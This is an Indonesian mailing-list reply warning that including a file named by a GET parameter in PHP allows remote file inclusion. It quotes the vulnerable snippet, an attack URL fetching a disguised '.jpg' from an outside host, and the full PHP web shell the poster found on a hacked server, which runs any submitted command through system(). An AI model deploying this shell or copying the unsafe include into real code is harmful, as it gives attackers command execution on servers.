Saya cuma pengin bantu menghidari hal2 yg ndak diinginkan :) On 13/12/05, LuckyGuy354 <[EMAIL PROTECTED]> wrote: > > Pakai fungsi is_file(). Contoh: > > <?php > > $filex = $_GET['mode'].".php"; > > if(is_file($filex)) > include $filex; > else include "errorpage.php"; > > ?>
andai ada "hacker" yang nulis urlnya seperti ini: http://www.yoursite.com/yourfile.php?mode=http://www.geocities.com/hackersite/script.jpg Dimana isi script.jpg kurang lebih seperti ini ----- potongan skrip ---- <b>#</b>php injection: <br> <FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>"> cmd : <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="100"> <br> <INPUT TYPE="submit"> </FORM> <hr color=777777 width=100% height=115px> </font> <pre><font color=lime size=2><b> <p align=left><? $cmd = $_POST['cmd']; if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> ---- potongan skrip ---- hasilnya adalah orang itu bisa kopi2 file seenaknya ke server anda. So, berhati2lah. PS: script bukan buatan saya. Ini finding saya benerin server yg kena hack, dan memang kesalahannya adalah dia main include() file yang didapat dari method GET. -- Best regards, Natali Ardianto [EMAIL PROTECTED] [Non-text portions of this message have been removed] ------------------------ Yahoo! Groups Sponsor --------------------~--> AIDS in India: A "lurking bomb." Click and help stop AIDS now. http://us.click.yahoo.com/VpTY2A/lzNLAA/yQLSAA/IHFolB/TM --------------------------------------------------------------------~-> ---------------------------------------------------------- Komunitas MasterWeb Indonesia http://www.master.web.id ---------------------------------------------------------- MWN, Masternya WEBHOSTING di Indonesia, Indo/USA Servers, Customer Support 24 jam http://www.masterwebnet.com ---------------------------------------------------------- WebDevelopment,Designing/Programming http://www.dlanet.com ---------------------------------------------------------- Yahoo! Groups Links <*> To visit your group on the web, go to: http://groups.yahoo.com/group/milis-masterweb/ <*> To unsubscribe from this group, send an email to: [EMAIL PROTECTED] <*> Your use of Yahoo! Groups is subject to: http://docs.yahoo.com/info/terms/
